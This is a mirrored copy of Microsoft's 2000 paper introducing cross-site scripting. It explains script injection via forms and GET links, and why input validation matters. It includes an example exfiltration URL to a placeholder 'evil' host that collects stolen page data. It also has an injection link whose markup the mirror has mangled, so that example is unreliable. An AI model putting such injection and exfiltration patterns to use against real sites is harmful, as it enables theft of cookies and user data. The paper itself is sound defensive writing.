spacer

Cross-site Scripting Overview


This is a historical document that describes the origins of the term Cross-site Scripting as a commonly accepted term. It exists here only as historical reference. As this is an important historical document it is mirrored here where I hope it will exist well into the future. Supplimental information on CERT and on Apache.

Cross-site Scripting Overview 

Originally Posted: February 2, 2000 

David Ross - Microsoft 
Ivan Brugiolo - Microsoft 
John Coates - Microsoft 
Microsoft - Microsoft 
Michael Roe - Microsoft Research 

Abstract 

A security issue has come to Microsofts attention that
we refer to as cross-site scripting. This is not an
entirely new issue  elements of the information we
present have been known for some time within the
software development community. However, the overall
scope of the issue is larger than previously understood,
both in terms of the breadth of the problem and the risk
that it presents. It is important to explore the issue more
comprehensively due to the current growth and
complexity of the Web. 

1. The Problem 

Web pages contain both text and HTML markup that is
generated by the server and interpreted by the client.
Servers that generate static pages have full control over
how the client will interpret the pages the server sends.
However, servers that generate dynamic pages do not
have control over how their output is interpreted by the
client. The heart of the cross-site scripting security issue
is that if untrusted content can be introduced into a
dynamic page, neither the server nor the client have
enough information at hand to recognize that this has
happened and take protective actions. 

In HTML, to distinguish text from markup, some characters
are treated specially. The grammar of HTML determines
the significance of special charactersdifferent
characters are special at different points in the document.
For example, the less-than sign (<) typically indicates the
beginning of an HTML tag. Tags can either affect the
formatting of the page or introduce a program that the
browser executes (e.g. the <SCRIPT> tag introduces a
JavaScript program). The fact that HTML can contain
programs written in scripting languages such as JavaScript
is another critical component of the cross-site scripting
issue. 

Many Web servers generate Web pages dynamically. For
example, a search engine may perform a database search
and then construct a Web page that contains the result
of the search. Any server that creates Web pages by
inserting dynamic data into a template should check to
make sure that the data to be inserted does not contain
any special characters (e.g. <). If the inserted data
contains special characters, the users Web browser will
mistake them for HTML markup. As HTML markup can
introduce programs, some data values  given the correct
syntax  could run as programs by the browser rather
than being displayed as text. A large number of servers
that dynamically generate Web pages dont check for
special characters, or dont do it correctly (e.g. they only
check some special characters, and neglect to check
others). 

The risk of a Web server not doing a check for special
characters in dynamically generated Web pages is this: If
an attacker can choose the data that the Web server
inserts into the generated page, then the attacker can
trick the users browser into running a program of the
attackers choice. This program will execute in the
browsers security context for communicating with the
victim Web server, not the browsers security context for
communicating with the attacker. Thus, the program will
execute in an inappropriate security context with
inappropriate privileges. A variation involving HTML forms
gives the attacker an easy way to perform this attack. 

1.1 The attack without forms 

Internet-based e-mail services and Web bulletin board
systems have understood specific instances of this
problem for quite some time. If a Web server takes data
provided by one person and uses it to construct a Web
page served to another, then the attack is obvious: the
attacker writes the script they want the victim to run,
then tells the Web server to send it to the victim. This
simple version of the attack could potentially affect any
Web-based chat rooms. The chat-room server provides
a client-to-client messaging service. User X can send user
Y a program that when executed sends a message to user
Z. The upshot of this attack is that X can potentially trick
Y into sending a message to Z, even if Y would never
have intentionally sent that message to Z. 

The effect of this exploit within the context of
client-to-client communications facilitated by a server is
widely recognized. Responsible Web site administrators
understand the need to prevent this scenario. However,
variants of the problem exist in other contexts as well,
and these are much less well understood. 

1.2 The attack using forms 

The security problem with HTML forms is that when a Web
server receives a completed form from a user agent it
cant tell where it came from. The URL to which the
completed form should be posted is part of the form. Two
forms can both specify the same posting URL. They do
not have to be on the same Web site; a form on an
attackers Web site can indicate to the browser that the
completed form should be posted to a completely different
Web site. 

Completed forms do not distinguish between data supplied
by the user, and data supplied by the source of the form
before the user filled it in. An attacker can create a
modified version of a Web sites form  one in which
certain fields that normally would be filled in by the user
are instead fixed in advance by the attacker. 

The attack proceeds as follows: 

     The attacker first identifies a Web site that will
     accept a filled-in form and reply with a Web page
     containing data taken from the form, without
     checking for special characters. 
     The attacker then creates their own form, on their
     own Web site, with the forms posting URL set to
     the victim Web server. 
     One of the fields is specified so that the victim Web
     servers reply contains a program that will be
     executed by the browser. 
     The attacker then entices a user into submitting the
     form. The attacker can make submitting the form
     indistinguishable from following a normal link, so all
     that is needed is for the attacker to be able to
     entice the user into following a link. 
     Upon receiving the reply from the victim Web
     server, the users browser will execute the program
     inside the reply. 

Why is this an attack? Why is it any different from the
attackers Web site sending the user a Web page
containing a program? The difference is in the apparent
source of the program. The actions a program is allowed
to perform depend on where it came from. The user can
define some Web sites as trusted (i.e. programs from
them are allowed to perform potentially-unsafe
operations, in the belief that they will not do so
maliciously), while others are not trusted (i.e. programs
from them should not be allowed to perform these
operations). This attack enables an untrusted Web site to
convince the browser that a program has come from a
trusted Web site. 

When the user interacts with several Web sites, these
interactions should be isolated from each other. Web site
X should not be able to monitor or interfere with a users
interactions with Web site Y, even if the user is talking to
both sites at the same time. This attack breaks through
this security barrier. Server X may interfere with the
users communication with server Y, as server X gains
control over a script the user runs to communicate with
Y. 

1.3 Consequences of the attack 

     Assuming that a particular Web server is vulnerable
     to cross-site scripting attacks, the attacker can run
     a script in the wrong security context. This means
     that cookies can be read; locked-down plug-ins or
     native code can be instantiated and scripted with
     untrusted data; user input may be intercepted. Any
     Web browser supporting scripting is potentially
     vulnerable, as is any Web server that supports
     HTML forms. HTTPS is not immune. 
     Data gathered by the malicious script can be sent
     back to the attackers Web site. For example, if the
     script has used the DHTML object model to extract
     data from a page, then it can send it to the
     attacker by fetching a URL of the following form: 

     www.[evil].com/Collect.asp?
     data=1234567890123456 

     As long as the user navigates within a given domain,
     a robust exploit script can follow the user. 
     This attack can be used against machines behind
     firewalls. Many corporate local area networks are
     configured so that client machines trust servers on
     the LAN but do not trust servers on the outside
     Internet. However, a server outside a firewall can
     fool a client inside the firewall into believing that a
     trusted server inside the firewall has asked it to
     execute a program. To do this, all the attacker
     needs is a Web server inside the firewall that
     doesnt check fields in forms for special characters. 
     Only one page on one Web server in a domain is
     required to compromise the entire domain. This is
     true even if the vulnerable Web server doesnt hold
     any important data: it can still be used as part of
     an attack on other machines within the same
     domain. All Web servers should guard against this
     attack, even ones that dont perform critical tasks. 

The need to validate all inputs rather than blindly using
them is familiar to the software development community,
including seasoned Web developers. However, this
guidance is infrequently followed by the Web developer
community at large, as evidenced by the large number of
Web sites that are vulnerable to this attack. We believe
this situation results in part because the full scope of the
damage that can be caused via such an attack has not
been well understood. Our intent is to highlight proper
Web site coding practices that, when implemented
correctly, serve to block this vulnerability. 

Please refer to Appendix A for some detailed code
samples of how an attack might appear in dynamically
generated HTML output and some suggestions for
preventing writing untrusted input to output. 

1.4 The attack with HTTP GET 

The Web provides two different mechanisms for submitting
forms, GET and POST. In the GET method, the
content of the form is used to construct a URL, which the
browser then retrieves. The Web server interprets a
request for that URL as a submission of the form. 

This attack works using both the GET and POST
methods. However, it is especially easy with GET method,
as the user does not need to be aware that they are
submitting a form. The attacker just needs to entice the
user into following a link. As far as the user is concerned,
they are just retrieving a Web page. But the victim Web
server will think that the user is submitting a form,
because they have asked for a special URL. 

It is not necessary to create a Web site in order to carry
out the GET version of this attack. The URL can be sent
in a mail message or posted to a USENET news group.
Examine the following HTML link: 

<a class=www.[foo].com/form.asp?
id=<script src="/img/spacer.gif"> 
gipoco.com is neither affiliated with the authors of this page nor responsible for its contents. This is a safe-cache copy of the original web site.